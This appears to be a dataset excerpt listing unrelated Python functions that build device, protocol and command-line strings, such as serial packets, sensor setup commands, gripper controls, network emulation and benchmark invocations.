"def _build_setup_command(self, cmd, unit):\n # use defaults - in the future, may consider making some of these parameters\n # byte 0\n channel_address = unit\n # byte 1\n line_feed = self._param_dict.format(Parameter.LINEFEED)\n parity_type = self._param_dict.format(Parameter.PARITY_TYPE)\n parity_enable = self._param_dict.format(Parameter.PARITY_ENABLE)\n extended_addressing = self._param_dict.format(Parameter.EXTENDED_ADDRESSING)\n baud_rate = self._param_dict.format(Parameter.BAUD_RATE)\n baud_rate = getattr(BaudRate, 'BAUD_%d' % baud_rate, BaudRate.BAUD_9600)\n # byte 2\n alarm_enable = self._param_dict.format(Parameter.ALARM_ENABLE)\n low_alarm_latch = self._param_dict.format(Parameter.LOW_ALARM_LATCH)\n high_alarm_latch = self._param_dict.format(Parameter.HIGH_ALARM_LATCH)\n rtd_wire = self._param_dict.format(Parameter.RTD_4_WIRE)\n temp_units = self._param_dict.format(Parameter.TEMP_UNITS)\n echo = self._param_dict.format(Parameter.ECHO)\n delay_units = self._param_dict.format(Parameter.COMMUNICATION_DELAY)\n # byte 3\n precision = self._param_dict.format(Parameter.PRECISION)\n precision = getattr(UnitPrecision, 'DIGITS_%d' % precision, UnitPrecision.DIGITS_6)\n large_signal_filter_constant = self._param_dict.format(Parameter.LARGE_SIGNAL_FILTER_C)\n large_signal_filter_constant = filter_enum(large_signal_filter_constant)\n small_signal_filter_constant = self._param_dict.format(Parameter.SMALL_SIGNAL_FILTER_C)\n small_signal_filter_constant = filter_enum(small_signal_filter_constant)\n\n # # Factory default: 0x31070182\n # # Lab default: 0x310214C2\n\n byte_0 = int(channel_address.encode(\"hex\"), 16)\n log.debug('byte 0: %s', byte_0)\n byte_1 = \\\n (line_feed << 7) + \\\n (parity_type << 6) + \\\n (parity_enable << 5) + \\\n (extended_addressing << 4) + \\\n baud_rate\n log.debug('byte 1: %s', byte_1)\n byte_2 = \\\n (alarm_enable << 7) + \\\n (low_alarm_latch << 6) + \\\n (high_alarm_latch << 5) + \\\n (rtd_wire << 4) + \\\n (temp_units << 3) + \\\n (echo << 2) + \\\n delay_units\n log.debug('byte 2: %s', byte_2)\n byte_3 = \\\n (precision << 6) + \\\n (large_signal_filter_constant << 3) + \\\n small_signal_filter_constant\n log.debug('byte 3: %s', byte_3)\n\n setup_command = '#%sSU%02x%02x%02x%02x' % (unit[0], byte_0, byte_1, byte_2, byte_3) + NEWLINE\n log.debug('default setup command (%r) for unit %02x (%s)' % (setup_command, byte_0, unit[0]))\n return setup_command",
"def buildCmd( tcmpCmd, cmd, target, sequence, fieldList):\n cmdList = [tcmpCmd, cmd, target, sequence, fieldList]\n\n return \"<{cmd}>\".format(cmd=\":\".join(cmdList))",
"def init_cmd( cmd_num=0):\n if cmd_num in [12,16,2,4,9,10,13,17,18,24]:\n log.warning(\"Command %d is not supported on SDIO, sending anyway but what are you doing?!\" %cmd_num)\n\n cmd = BinaryValue(bits=48,bigEndian=False)\n cmd[47] = 0 # Start value\n cmd[46] = 1 # Direction , 1 = towards device, 0 = towards host\n cmd[45:40] = BinaryValue(value=cmd_num, bits=6, bigEndian=False).integer\n cmd[0] = 1 # Stop bit\n return cmd",
"def build_message(cmd, data):\r\n\tif len(cmd) > CMD_FIELD_LENGTH or len(data) > MAX_DATA_LENGTH:\r\n\t\treturn None\r\n\tfull_cmd = cmd + \" \"*(CMD_FIELD_LENGTH-len(cmd))\r\n\tdata_len = str(len(data))\r\n\tfull_data_len = \"0\"*(LENGTH_FIELD_LENGTH-len(data_len))+data_len\r\n\tfull_msg = DELIMITER.join([full_cmd, full_data_len, data])\r\n\treturn full_msg",
"def _pack(self):\n\n opt = 0\n if self.notify:\n opt = opt | CQC_OPT_NOTIFY\n if self.block:\n opt = opt | CQC_OPT_BLOCK\n if self.action:\n opt = opt | CQC_OPT_ACTION\n\n cmdH = struct.pack(self.PACKAGING_FORMAT, self.qubit_id, self.instr, opt)\n return cmdH",
"def build_command_depricated(device_dict, command_tuple):\n command = \" \" # The final command which should be send in the end\n return_list = [] # Is list of commands which can be returned if need be\n only_command = False # Flag if only a command was passed, important if such a command doesnt need syntax!\n\n if (\n type(command_tuple) == type(u\"Unicode\")\n or type(command_tuple) == str\n or type(command_tuple) == float\n or type(command_tuple) == int\n ):\n command_tuple = (str(command_tuple), \"\") # so only tuple are now prevelent\n only_command = True\n elif type(command_tuple[1]) == list:\n command_tuple = (\n command_tuple[0],\n [str(x) for x in command_tuple[1]],\n ) # so no unicode is present\n\n # Preparations\n # look for a syntax (paranteses and so on)\n if \"syntax\" in device_dict:\n syntax = str(device_dict[\"syntax\"])\n syntax = syntax.split(\"###\")\n if not syntax[0]:\n syntax = [\"\", \"\"] # Most devices have no paranteses or whatsoever\n else:\n syntax = [\"\", \"\"] # Most devices have no paranteses or whatsoever\n\n # Looks if a separator is needed to sepatare mulitple orders\n if \"separator\" in device_dict:\n sepa = str(device_dict[\"separator\"])\n else:\n sepa = \" \" # This should be the standard for most devices\n\n if command_tuple[0] in device_dict:\n # here all the magic happens\n # First look if the order is swichted or not (command value, or value command)\n\n # Check if multiple commands so list or so\n if type(device_dict[command_tuple[0]]) == str or type(\n device_dict[command_tuple[0]]\n ) == type(u\"Unicode\"):\n command_list = [device_dict[command_tuple[0]]]\n else:\n command_list = device_dict[command_tuple[0]]\n\n for command_item in command_list:\n command_item = str(command_item)\n command = \"\"\n\n # Value -> Command\n if int(device_dict.get(\"command_order\", 1)) == -1:\n # Now look if a csv structure is necessary for the command to work\n start_ind = command_tuple[0].find(\n \"_\"\n ) # finds the index of the command, to search for\n if (\n \"CSV\" + command_tuple[0][start_ind:] in device_dict\n ): # looks if an actual csv-command is there\n # Todo: test CSV command\n csv_commands = device_dict[\n \"CSV\" + str(command_tuple[0])[start_ind:]\n ]\n csv_commands = (\n csv_commands.strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n ) # get rid of some caracters which should not be there\n csv_commands = csv_commands.split(\n \",\"\n ) # now split it for easy access\n\n # Make sure you always got a list of the next commandblock will fail\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n value_list = command_tuple[1]\n elif type(command_tuple[1]) == str or type(command_tuple) == type(\n u\"Unicode\"\n ):\n value_list = (\n command_tuple[1]\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n .replace(\" \", \"\")\n )\n value_list = value_list.split(\",\")\n\n csv_list = (\n \",\".join(map(str, value_list))\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n )\n csv_list = csv_list.split(\",\")\n\n for i, com in enumerate(csv_list):\n # here the input will be checked if enough parameters are passed for this command.\n # If not a 0 will be entered and a warning will be printed\n command += str(csv_list[i]).strip() + sepa\n\n if i + 1 < len(csv_commands) and len(csv_commands) > 1:\n for j in range(\n i + 1, len(csv_commands)\n ): # Fill the rest of the missing paramters\n l.error(\n \"Warning: Not enough 
parameters passed for function: \"\n + str(command_item)\n + \" the command must consist of \"\n + str(csv_commands)\n + \" '\"\n + str(csv_commands[j])\n + \"' is missing! Inserted 0 instead.\"\n )\n command += \"0\" + sepa\n\n command = command.strip(\" \").strip(\",\") # to get rid of last comma\n\n else: # So if no CSV was found for this command, just build the command with the value and the separator\n # First check if a List is present or so\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n string = \"\"\n for item in command_tuple[1]:\n command = syntax[1] + str(item) + \" \" + command_item\n command = command.strip()\n # Add a command terminator if one is needed and the last part of the syntax\n command += device_dict.get(\"execution_terminator\", \"\")\n return_list.append(command)\n return return_list\n\n else: # If only a command was passed\n string = str(command_tuple[1])\n command += syntax[1] + str(string).strip()\n\n if (\n only_command\n and device_dict.get(\"no_syntax_with_single_commmand\", False)\n and syntax[1] != \" \"\n and syntax[0] != \" \"\n ):\n command = command.replace(syntax[1], \"\")\n command = command.replace(syntax[0], \"\")\n\n # command += \" \" + str(device_dict[str(command_item)]).strip() + syntax[0] # adds the order to the command\n command += (\n \" \" + str(command_item).strip() + syntax[0]\n ) # adds the order to the command\n # Add a command terminator if one is needed and the last part of the syntax\n command = command.strip()\n command += device_dict.get(\"execution_terminator\", \"\")\n # command += syntax[0] # adds the order to the command\n return_list.append(command)\n\n # Command -> Value\n else:\n command += (\n str(command_item).strip() + \" \" + syntax[0]\n ) # adds the order to the command\n\n # Now look if a csv structure is necessary for the command to work\n start_ind = command_tuple[0].find(\n \"_\"\n ) # finds the index of the command, to search for\n if (\n \"CSV\" + command_tuple[0][start_ind:] in device_dict\n ): # looks if an actual csv-command is there\n # Todo: test CSV command\n csv_commands = device_dict[\n \"CSV\" + str(command_tuple[0])[start_ind:]\n ]\n csv_commands = (\n csv_commands.strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n ) # get rid of some caracters which should not be there\n csv_commands = csv_commands.split(\n \",\"\n ) # now split it for easy access\n\n # Make sure you always got a list of the next commandblock will fail\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n value_list = command_tuple[1]\n elif type(command_tuple[1]) == str or type(command_tuple) == type(\n u\"Unicode\"\n ):\n value_list = (\n command_tuple[1]\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n .replace(\" \", \"\")\n )\n value_list = value_list.split(\",\")\n\n csv_list = (\n \",\".join(map(str, value_list))\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n )\n csv_list = csv_list.split(\",\")\n\n for i, com in enumerate(csv_list):\n # here the input will be checked if enough parameters are passed for this command.\n # If not a 0 will be entered and a warning will be printed\n command += str(csv_list[i]).strip() + sepa + \" \"\n\n if i + 1 < len(csv_commands) and len(csv_commands) > 1:\n for j in range(\n i + 1, len(csv_commands)\n ): # Fill the rest of the missing paramters\n l.warning(\n \"Not enough parameters passed for function: \"\n + 
str(command_tuple[0])\n + \" the command must consist of \"\n + str(csv_commands)\n + \" '\"\n + str(csv_commands[j])\n + \"' is missing! Inserted 0 instead.\"\n )\n command += \" \" + \"0\" + sepa\n\n command = command.strip(\" \").strip(\n \",\"\n ) # to get rid of last comma and space at the end if csv\n command += syntax[1]\n\n else: # So if no CSV was found for this command, just build the command with the value and the separator\n # First check if a List is present or so\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n string = \"\"\n for item in command_tuple[1]:\n command = str(item) + \" \" + command_item + syntax[1]\n command = command.strip()\n # Add a command terminator if one is needed and the last part of the syntax\n command += device_dict.get(\"execution_terminator\", \"\")\n return_list.append(command)\n return return_list\n\n else: # If its just one value or no value\n string = str(command_tuple[1])\n command += string.strip() + syntax[1]\n command = command.strip()\n\n if (\n only_command\n and device_dict.get(\"no_syntax_with_single_commmand\", False)\n and syntax[1] != \" \"\n and syntax[0] != \" \"\n ):\n command = command.replace(syntax[1], \"\")\n command = command.replace(syntax[0], \"\")\n\n # Add a command terminator if one is needed and the last part of the syntax\n command += device_dict.get(\"execution_terminator\", \"\")\n return_list.append(command.strip())\n else:\n # If the command is not found in the device only command tuple will be send\n l.error(\n \"Command \"\n + str(command_tuple[0])\n + \" was not found in device! Unpredictable behavior may happen. No commad build!\"\n )\n return \"\"\n\n # Add a command terminator if one is needed and the last part of the syntax\n # command += device_dict.get(\"execution_terminator\",\"\")\n\n # Todo: multiple commands return\n if len(return_list) > 1:\n return return_list\n else:\n return str(return_list[0])",
"def _pack(self):\n header = struct.pack(self.PACKAGING_FORMAT, self.cmd_length)\n return header",
"def __build_command_string(self, cmd):\n cmd_string = cmd.command\n\n # if we know the number of frames that this command returns,\n # only wait for exactly that number. This avoids some harsh\n # timeouts from the ELM, thus speeding up queries.\n\n\n return cmd_string",
"def _gen_cmd(cmd, address):\n family = {4: 'inet', 6: 'inet6'}[address[0].version]\n args = ['addr', cmd, '%s/%s' % (address[0], address[1])]\n if family == 'inet' and cmd == 'add':\n args += ['brd', '+']\n args += ['dev', real_ifname]\n if family == 'inet6':\n args = ['-6'] + args\n return args",
"def _create_packet(self, request):\n\n data_len = struct.pack('<Q', len(request))\n packet = b'ZBXD\\x01' + data_len + request\n\n def ord23(x):\n if not isinstance(x, int):\n return ord(x)\n else:\n return x\n\n logger.debug('Packet [str]: %s', packet)\n logger.debug('Packet [hex]: %s', ':'.join(hex(ord23(x))[2:] for x in packet))\n return packet",
"def make_packet(self, type, data): \n return (\"{}\\x00{}\\x00{}\".format(type, data, self.ID)).encode()",
"def _build_menu_command(self, cmd):\n if COMMAND_CHAR[cmd]:\n return COMMAND_CHAR[cmd]+self._newline\n else:\n raise InstrumentProtocolException(\"Unknown command character for %s\" % cmd)",
"def _build_robovac_command(mode, command):\n mcu_ota_header_0xa5 = 0xA5\n cmd_data = (mode.value + command.value)\n\n return bytes([mcu_ota_header_0xa5, mode.value, command.value, cmd_data, 0xFA])",
"def buildCommand(self, player, game, json):",
"def build_command(device, command_tuple, single_commands=False):\n if isinstance(command_tuple, (str)):\n command_tuple = (command_tuple, \"\") # make da dummy command\n\n if command_tuple[0] in device:\n\n if isinstance(device[command_tuple[0]], dict):\n try:\n com = device[command_tuple[0]][\"command\"]\n except:\n l.error(\n \"Dict command structure recognised but no actual command found for passed order {}\".format(\n command_tuple\n ),\n exc_info=True,\n )\n return None\n else:\n com = device[command_tuple[0]]\n\n if isinstance(command_tuple[1], (str, float, int)):\n try:\n return com.format(command_tuple[1])\n except IndexError:\n l.error(\n \"You attempted to send a command with the wrong number of parameters the command structure is: {}\"\n \" but you passed: [{}] as parameter(s)\".format(\n com, command_tuple[1]\n ),\n exc_info=True,\n )\n\n elif single_commands:\n if isinstance(command_tuple[1], list) or isinstance(\n command_tuple[1], tuple\n ):\n return [com.format(single) for single in command_tuple[1]]\n else:\n l.error(\"In order to build a list command, a list has to be passed!\")\n return None\n\n elif isinstance(command_tuple[1], list) or isinstance(command_tuple[1], tuple):\n # Find occurance of {} in string if list is as long as occurance of {} then just pass otherwise join a string\n brackets_count = device[command_tuple[0]].count(\"{}\")\n if len(command_tuple[1]) == brackets_count:\n return com.format(*command_tuple[1])\n elif brackets_count == 1 and len(command_tuple[1]) > brackets_count:\n sep = device.get(\"separator\", \" \")\n return com.format(sep.join([str(x) for x in command_tuple[1]]))\n elif (\n len(command_tuple[1]) > brackets_count\n or len(command_tuple[1]) < brackets_count\n and brackets_count != 1\n ):\n l.error(\n \"Could not build command for input length {}\"\n \" and input parameters length {}. Input parameters must be of same length\"\n \" as defined in config or 1\".format(\n len(command_tuple[1]), brackets_count\n )\n )\n return None\n else:\n l.error(\n \"Could not find command {} in command list of device: {}\".format(\n command_tuple[0], device[\"Device_name\"]\n )\n )",
"def build(self, origin, token, args):\r\n # If the last argument is \"long\", package it for sending\r\n if len(args) > 0:\r\n if args[-1].find(\" \") > -1:\r\n build_last_arg = \":\" + args[-1]\r\n build_args = args[0:-1] + build_last_arg.split(\" \")\r\n else:\r\n build_args = args\r\n else:\r\n build_args = []\r\n # Build the line\r\n # Future compatibility - only send \\n\r\n ret = create_numeric(origin) + \" \" + token + \" \" \\\r\n + \" \".join(build_args) + \"\\n\"\r\n \r\n # Check we're not sending things which are protocol violations\r\n if len(ret) > 512:\r\n raise ProtocolError('Line too long to send')\r\n if not token.isupper() and not token.isdigit():\r\n raise ProtocolError('Command not in uppercase during build')\r\n \r\n return ret",
"def genCommand(self,char, command): \n\t\t\n\t\tif char == 'a':\n\t\t\tcommand = outputMsg.Robotiq2FGripper_robot_output();\n\t\t\tcommand.rACT = 1\n\t\t\tcommand.rGTO = 1\n\t\t\tcommand.rSP = 255\n\t\t\tcommand.rFR = 150\n\n\t\tif char == 'r':\n\t\t\tcommand = outputMsg.Robotiq2FGripper_robot_output();\n\t\t\tcommand.rACT = 0\n\n\t\tif char == 'c':\n\t\t\tcommand.rPR = 255\n\n\t\tif char == 'o':\n\t\t\tcommand.rPR = 0 \n\n\t\t#If the command entered is a int, assign this value to rPRA\n\t\ttry: \n\t\t\tcommand.rPR = int(char)\n\t\t\tif command.rPR > 255:\n\t\t\t\tcommand.rPR = 255\n\t\t\tif command.rPR < 0:\n\t\t\t\tcommand.rPR = 0\n\t\texcept ValueError:\n\t\t\tpass \n\t\t\t\n\t\tif char == 'f':\n\t\t\tcommand.rSP += 25\n\t\t\tif command.rSP > 255:\n\t\t\t\tcommand.rSP = 255\n\t\t\t\t\n\t\tif char == 'l':\n\t\t\tcommand.rSP -= 25\n\t\t\tif command.rSP < 0:\n\t\t\t\tcommand.rSP = 0\n\n\t\t\t\t\n\t\tif char == 'i':\n\t\t\tcommand.rFR += 25\n\t\t\tif command.rFR > 255:\n\t\t\t\tcommand.rFR = 255\n\t\t\t\t\n\t\tif char == 'd':\n\t\t\tcommand.rFR -= 25\n\t\t\tif command.rFR < 0:\n\t\t\t\tcommand.rFR = 0\n\n\t\treturn command",
"def _command(self, servo_id, instruction, *params):\n length = 3 + len(params)\n #print('length', length)\n \"\"\"\n checksum calculation:\n checksum = ~(ID + length+instruction+parms) if the numbers in the brackets\n are calculated and exceeded 255, then it takes the lowest one byte, \"~\"\n means Negation\n \"\"\"\n checksum = 255 - ((servo_id + length + instruction + sum(params))% 256)\n #print('checksum', checksum)\n packet = [0x55, 0x55, servo_id, length, instruction, *params, checksum]\n #print('packet', packet)\n self._serial.write(bytearray(packet))\n #print('Sending packet', packet)",
"def _buildCmd(self, cmd, cmdArg=0x00):\n res = [cmd, cmdArg]\n if self.USE_SUFFIX:\n return res + [self.CMD_SUFFIX]\n return res",
"def make_command(self):\n # self.add_root_bucket()\n\n stringa = \"tc qdisc add dev \" + self.__interface + \" root netem \"\n stringa += \"delay \" + self.latency['latency'] + \"ms \" + self.latency['jitter'] + \"ms \" + self.latency[\n 'correlation'] + \"% distribution \" + self.latency['distribution']\n stringa += \" loss \" + self.drop['probability'].__str__() + \"% \" + self.drop['correlation'].__str__() + \"%\"\n stringa += \" corrupt \" + self.corrupt['probability'].__str__() + \"% duplicate \" + \\\n self.duplicate['probability'].__str__() + \"%\"\n\n cmd = shlex.split(stringa)\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n try:\n o, e = proc.communicate(timeout=1)\n except subprocess.TimeoutExpired:\n proc.kill()\n raise RuntimeWarning(\"Old configuration not eliminated\")\n\n if e.decode('ascii') != \"\":\n if proc.returncode == 2:\n raise RuntimeWarning(e.decode('ascii') + \"\\nUsing stale configuration, wipe the old settings\")\n return str(proc.returncode)",
"def buildCommandModel ( switchSpecs, posSpecs ):\n\n #-- 1 --\n result = []\n\n #-- 2 --\n # [ result +:= strings representing the options in switchSpecs ]\n for switch in switchSpecs:\n result.append ( \"-%s\" % switch.letter )\n\n #-- 3 --\n # [ result +:= strings representing the keys in posSpecs ]\n for pos in posSpecs:\n if pos.optional:\n result.append ( \"[%s]\" % pos.key )\n else:\n result.append ( pos.key )\n if pos.repeated:\n result.append ( \"...\" )\n\n #-- 4 --\n # [ return the concatenation of the strings in result with single\n # spaces between them ]\n return \" \".join ( result )",
"def _build_simple_command(self, cmd):\n return cmd+SBE37_NEWLINE",
"def __init__(self, command=None, data_length=0, data=[]):\n if command is not None:\n self.command = command\n self.data_length = data_length\n self.data = data\n self.encode()\n else:\n self.message_length = 0\n self.command = 0\n self.data_length = 0\n self.data = []\n self.string = \"\"",
"def _build_command_prelude(class_number, verb):\n return struct.pack(\"<II\", class_number, verb)",
"def makePacket(self,dhash,index,val=None):\n msg = STX + self.addr + CMD\n if val is None:\n msgtype = DATA_READ\n else:\n msgtype = DATA_WRITE\n msg += msgtype\n payload = dhash + chr(index)\n if val is not None:\n payload += struct.pack('>I',val)\n table = {STX : ESC_STX, CR : ESC_CR, ESC : ESC_ESC}\n for i in range(len(payload)):\n if payload[i] in table:\n msg += ESC\n msg += table[payload[i]]\n else:\n msg += payload[i]\n cksum = self.checksum(self.addr+CMD+msgtype+payload)\n msg += cksum\n msg += CR\n return msg",
"def genCommand(char, command): \n \n if char == 'a':\n command = SModelRobotOutput();\n command.rACT = 1\n command.rGTO = 1\n command.rSPA = 255\n command.rFRA = 150\n\n if char == 'r':\n command = SModelRobotOutput();\n command.rACT = 0\n\n if char == 'c':\n command.rPRA = 255\n\n if char == 'o':\n command.rPRA = 0\n\n if char == 'b':\n command.rMOD = 0\n \n if char == 'p':\n command.rMOD = 1\n \n if char == 'w':\n command.rMOD = 2\n \n if char == 's':\n command.rMOD = 3\n\n #If the command entered is a int, assign this value to rPRA\n try: \n command.rPRA = int(char)\n if command.rPRA > 255:\n command.rPRA = 255\n if command.rPRA < 0:\n command.rPRA = 0\n except ValueError:\n pass \n \n if char == 'f':\n command.rSPA += 25\n if command.rSPA > 255:\n command.rSPA = 255\n \n if char == 'l':\n command.rSPA -= 25\n if command.rSPA < 0:\n command.rSPA = 0\n\n \n if char == 'i':\n command.rFRA += 25\n if command.rFRA > 255:\n command.rFRA = 255\n \n if char == 'd':\n command.rFRA -= 25\n if command.rFRA < 0:\n command.rFRA = 0\n\n return command",
"def packSimulationCommand(self, lstCommand):\n szCommand = \"\"\n szCommand = struct.pack('16si', lstCommand[0], lstCommand[1])\n szCommand += struct.pack('i', len(lstCommand[2:]))\n for i in lstCommand[2:]:\n szCommand += struct.pack('16s', i[0])\n szCommand += struct.pack('i', len(i[1:]))\n for j in i[1:]:\n szCommand += struct.pack('i', j)\n\n return szCommand",
"def buildnc(self, cmd=''):\r\n tmtcport = 21904\r\n if 'tmtcport' in self.config['ue']:\r\n tmtcport = self.config['ue']['tmtcport']\r\n\r\n nccmd = cmdObj()\r\n nccmd['cmd'] = \"echo -n \" + cmd + ' | busybox nc 127.0.0.1 ' + str(tmtcport)\r\n #FIXME: nc should be responsed quickly, hardcoded here.\r\n nccmd['timeout'] = 1\r\n return nccmd",
"def _build_direct_command(self, cmd, arg):\n return \"%s%s\" % (arg, self._newline)",
"def gen_parse_packet_source(cmd_list):\n\t#TODO: check for count == 0\n\ts = \"\"\n\ts += \"void parse_packet(uint8_t *buf, uint16_t count){\\n\"\n\ts += \"\\tuint8_t cmd = buf[0];\\n\"\n\ts += \"\\tswitch(cmd){\\n\"\n\tfor c in cmd_list:\n\t\ts += \"\\t\\t/* %s */\\n\"%(c[\"name\"])\n\t\ts += \"\\t\\tcase 0x%02X: /* (Write form) */\\n\"%c[\"code\"]\n\t\ts += \"\\t\\t\\tparse_%s(buf, \"%cannon_name(c[\"name\"])\n\t\tadd_trigger = False\n\t\tfor a in c[\"argument\"]:\n\t\t\tif a[0] == \"*\":\n\t\t\t\ts += \"DataReal.%s, \"%(a[1])\n\t\t\t\tadd_trigger = True;\n\t\t\telse:\n\t\t\t\ts += \"&(DataReal.%s), \"%(a[1])\n\t\ts = s[0:-2] + \");\\n\"\n\t\ts += \"\\t\\t\\tbuf[0] = cmd;\\n\"\n\t\ts += \"\\t\\t\\tsend_packet(buf, 1);\\n\"\n\t\tif add_trigger:\n\t\t\ts += \"\\t\\t\\t%s_trigger();\\n\"%cannon_name(c[\"name\"])\n\t\ts += \"\\t\\t\\tbreak;\\n\"\n\t\t\n\t\ts += \"\\t\\tcase 0x%02X: /* (Read form) */\\n\"%(c[\"code\"] | 0x80)\n\t\ts += \"\\t\\t\\tsend_%s(\"%cannon_name(c[\"name\"])\n\t\tfor a in c[\"argument\"]:\n\t\t\ts += \"DataReal.%s, \"%(a[1])\n\t\ts = s[0:-2] + \");\\n\"\n\t\ts += \"\\t\\t\\tbreak;\\n\"\n\ts += \"\\t\\tdefault:\\n\"\n\ts += \"\\t\\t\\tbuf[0] = 0;\\n\"\n\ts += \"\\t\\t\\tsend_packet(buf, 1);\\n\"\n\ts += \"\\t\\t\\tbreak;\\n\"\n\ts += \"\\t}\\n}\\n\"\n\treturn s\n\t#TODO: writeable stuff ",
"def net_cmd(self):\n \n logging.debug(\"net_cmd called\")\n cmd = \"\"\n # FIXME should probably grab the PrefixLength from the network definition\n # calc my router\n \n # FIXME: Need to split this into separate files...\n # files will be a dictionary of {\"filename\":\"contents\"}\n files = {}\n \n cmd = \"rem cmd\\r\\n\"\n tmpl = \"\"\"netsh interface ip set address \"%(nic)s\" static %(v4_fixed_ip)s 255.255.255.0\\r\\n\"\"\"\n # FIXME: this should be read out of the configuration, probably\n nets = self.networks\n ips = self.ip_addresses \n my_router = \"\"\n for netname in nets:\n v4_fixed_ip = ips.get(netname)\n my_net = v4_fixed_ip.split(\".\")[:3]\n my_net.append(\"254\")\n my_router = \".\".join(my_net)\n nic = \"%s-%s\" % (self.footprint.footprint_name, netname)\n logging.debug(\"Creating %s for %s\" % (nic, nets))\n # net_id = self.networks.get(netname)\n cmd = cmd + tmpl % locals()\n \n cmd += \"\"\"route -p add 192.168.1.0 MASK 255.255.255.0 %(my_router)s\\r\\n\"\"\" % locals()\n cmd += \"\"\"route -p add 192.168.2.0 MASK 255.255.255.0 %(my_router)s\\r\\n\"\"\" % locals()\n cmd += \"\"\"route -p add 192.168.3.0 MASK 255.255.255.0 %(my_router)s\\r\\n\"\"\" % locals()\n logging.debug(\"cmdfile:\\n\" + cmd)\n \n # print 50 * \"x\"\n # print cmd\n return cmd",
"def generate_command_string(self, operation, *args, **kwargs):\n cmd = [self.terraform_binary_path, operation]\n\n for key, value in kwargs.items():\n if key == \"var\":\n for varkey, varval in value.items():\n option = \"-var=\"\n option += \"'%s=%s'\" % (varkey, varval)\n cmd.append(option)\n else:\n option = \"\"\n if \"_\" in key:\n key = key.replace(\"_\", \"-\")\n\n if value == \"IsFlag\":\n option = \"-%s\" % key\n else:\n option = \"-%s=%s\" % (key, value)\n cmd.append(option)\n\n if len(args) > 0:\n for arg in args:\n cmd.append(arg)\n\n return \" \".join(cmd)",
"def create_message(self, packet):\n self._header.packet_len = len(bytes(packet))\n \n frame_bytes = super(EthernetTransport, self).create_message(packet) \n \n # Update control counter for next frame\n self._header.update_control()\n \n return bytes(frame_bytes)",
"def _BuildCommand(self, command_name, parameter_files=None, **kwargs):\n command = [YCSB_EXE, command_name, self.database]\n\n parameters = self.parameters.copy()\n parameters.update(kwargs)\n\n # Adding -s prints status which includes average throughput per sec.\n if _THROUGHPUT_TIME_SERIES.value and command_name == 'run':\n command.append('-s')\n parameters['status.interval'] = _STATUS_INTERVAL_SEC\n\n # These are passed as flags rather than properties, so they\n # are handled differently.\n for flag in self.FLAG_ATTRIBUTES:\n value = parameters.pop(flag, None)\n if value is not None:\n command.extend(('-{0}'.format(flag), str(value)))\n\n for param_file in list(self.parameter_files) + list(parameter_files or []):\n command.extend(('-P', param_file))\n\n for parameter, value in parameters.items():\n command.extend(('-p', '{0}={1}'.format(parameter, value)))\n\n return 'cd %s && %s' % (YCSB_DIR, ' '.join(command))",
"def _build_payload(self, commands, method, rpc_version=\"2.0\", api_version=1.0):\n payload_list = []\n id_num = 1\n for command in commands:\n payload = {\n \"jsonrpc\": rpc_version,\n \"method\": method,\n \"params\": {\"cmd\": command, \"version\": api_version},\n \"id\": id_num,\n }\n payload_list.append(payload)\n id_num += 1\n\n return json.dumps(payload_list)",
"def _build_command(self, code_command):\n if code_command == 'end':\n return roboc_command.RobocCommandExit()\n elif code_command[0] == 'E':\n return roboc_command.RobocMoveEast(int(code_command[1:]))\n elif code_command[0] == 'W':\n return roboc_command.RobocMoveWest(int(code_command[1:]))\n elif code_command[0] == 'S':\n return roboc_command.RobocMoveSouth(int(code_command[1:]))\n elif code_command[0] == 'N':\n return roboc_command.RobocMoveNorth(int(code_command[1:]))\n else:\n print(code_command)\n raise ValueError()",
"def _commandTemplate(self, command:dict) -> ET.Element:\n\t\tresult = ET.Element('Command')\n\t\tfor key,value in command.items():\n\t\t\tET.SubElement(result,key).text = value\n\t\treturn result",
"def post_build(self, pkt, pay):\n if self.length is None:\n pkt = struct.pack(\"!I\", len(pay) + 2) + pkt[4:]\n return pkt + pay",
"def build_command(args, parser):\n cmd = \"ipmitool -I lanplus\"\n if not args.host:\n print \"\\nERROR: hostname is required.\\n\"\n parser.print_help()\n sys.exit(1)\n else:\n cmd += ' -H ' + args.host\n if args.port:\n cmd += ' -p ' + args.port\n if not args.user:\n print \"\\nERROR: username is required.\\n\"\n parser.print_help()\n sys.exit(1)\n else:\n cmd += ' -U ' + args.user\n if args.passwd:\n cmd += ' -P ' + args.passwd\n cmd += ' dcmi power reading'\n if args.interval:\n global INTERVAL\n INTERVAL = args.interval\n if args.nread:\n global NREAD\n NREAD = args.nread\n else:\n global INFINITY\n INFINITY = True\n if args.store:\n global STORE\n STORE = True\n return cmd",
"def _command(self):\n command = self.subdevice.get_cmd_generic_timed(len(self.channels),\n self.scanPeriod)\n command.start_src = TRIG_SRC.int\n command.start_arg = 0\n command.stop_src = TRIG_SRC.count\n command.stop_arg = self.samples\n command.chanlist = self.channels\n # Adding to remove chunk transfers (TRIG_WAKE_EOS)\n wake_eos = _NamedInt('wake_eos', 32)\n if wake_eos not in CMDF:\n CMDF.append(wake_eos)\n command.flags = CMDF.wake_eos\n return command",
